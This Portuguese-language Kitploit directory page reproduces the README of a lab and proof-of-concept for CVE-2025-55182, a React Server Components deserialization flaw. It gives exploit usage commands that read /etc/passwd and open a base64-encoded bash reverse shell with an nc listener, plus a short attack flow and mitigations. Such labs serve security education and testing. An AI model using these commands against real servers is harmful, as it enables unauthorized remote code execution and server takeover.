Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
react2shell-lab — CVE-2025-55182 React2Shell laboratório de PoC | Kitploit
Ferramentas/GitHubGitHub/alsaut1/react2shell-lab
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de PayloadsLabs e Prática
GitHubalsaut1/react2shell-lab
74há 9 mesesAinda não revisado

react2shell-lab

CVE-2025-55182 React2Shell laboratório de PoC

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

React2Shell - Laboratório CVE-2025-55182

Um laboratório abrangente para demonstrar e testar a vulnerabilidade crítica CVE-2025-55182 em React Server Components.

⚠️ Apenas para Fins Educacionais

Este repositório destina-se a:

  • Pesquisa e educação em segurança
  • Compreensão dos mecanismos de vulnerabilidade
  • Testes em seus próprios sistemas
  • Preparação para caça a bugs (bug bounty)

Não use contra sistemas que você não possui ou sem permissão explícita para testar. Acesso não autorizado é ilegal.

🔴 Detalhes da Vulnerabilidade

  • CVE ID: CVE-2025-55182
  • Pontuação CVSS: 10.0 (Crítica)
  • Tipo: Execução Remota de Código (RCE) não autenticada
  • Componentes Afetados:
    • React 19.0.0 - 19.2.0
    • Next.js 15.x - 16.x
  • Causa raiz: Desserialização insegura no protocolo "Flight" do React Server Components

⚡ Capacidades

✅ Executar comandos arbitrários sem autenticação
✅ Ler arquivos do sistema
✅ Criar e modificar arquivos
✅ Estabelecer conexões reverse shell
✅ Obter controle total do servidor

🚀 Início Rápido

1. Instalação

Baixar ferramenta
root@kitploit:~
npm install --legacy-peer-deps
npm run dev

O servidor iniciará em http://localhost:3000

2. Verificar Vulnerabilidade

root@kitploit:~
bash check-cve.sh

3. Executando Exploits

root@kitploit:~
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"

4. Shell Reversa

root@kitploit:~
# Terminal 1 - Listener
nc -lvnp 4444

# Terminal 2 - Exploit
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"

📁 Estrutura do Projeto

root@kitploit:~
├── app/              # Vulnerable Next.js application
├── exploit/          # Working PoC exploit
│   └── rce_final.py  # Main exploit script
├── check-cve.sh      # Automated vulnerability checker
├── package.json      # Vulnerable dependencies
└── README.md

🔧 Detalhes Técnicos

A vulnerabilidade existe na lógica de desserialização de payloads do React Server Components. O exploit utiliza poluição de protótipo (prototype pollution) para executar código arbitrário via process.mainModule.require('child_process').execSync().

Fluxo de Ataque

  1. Criar dados de formulário multipart maliciosos
  2. Enviar para o aplicativo React vulnerável
  3. Explorar a desserialização insegura no protocolo "Flight"
  4. Obter RCE no servidor

📊 Impacto

  • Confidencialidade: ALTA (ler qualquer arquivo)
  • Integridade: ALTA (modificar/criar arquivos)
  • Disponibilidade: ALTA (executar comandos de negação de serviço)

✅ Mitigação

  1. Atualize o React para 19.2.1 ou posterior
  2. Atualize o Next.js para 15.0.5+ ou 16.0.7+
  3. Implante regras de Web Application Firewall (WAF)
  4. Monitore os logs do servidor em busca de tentativas de exploração
  5. Use mecanismos de proteção em tempo de execução

📚 Referências

  • react2shell.com
  • Detalhes da CVE-2025-55182
  • Aviso de Segurança do React
  • Calculadora CVSS

⚖️ Aviso Legal

Este código é fornecido apenas para fins educacionais e de testes de segurança autorizados. Os usuários são responsáveis por garantir que possuem autorização adequada antes de testar qualquer sistema. O acesso não autorizado a sistemas de computador é ilegal sob leis como o Computer Fraud and Abuse Act (CFAA) e legislação semelhante em outras jurisdições.

O autor não assume nenhuma responsabilidade pelo uso indevido destas informações.

🎓 Resultados de Aprendizado

Após concluir este laboratório, você entenderá:

  • Como funcionam as vulnerabilidades de desserialização insegura
  • Técnicas de ataque por poluição de protótipo (prototype pollution)
  • Arquitetura do React Server Components
  • Métodos de exploração de RCE
  • Práticas adequadas de divulgação de vulnerabilidades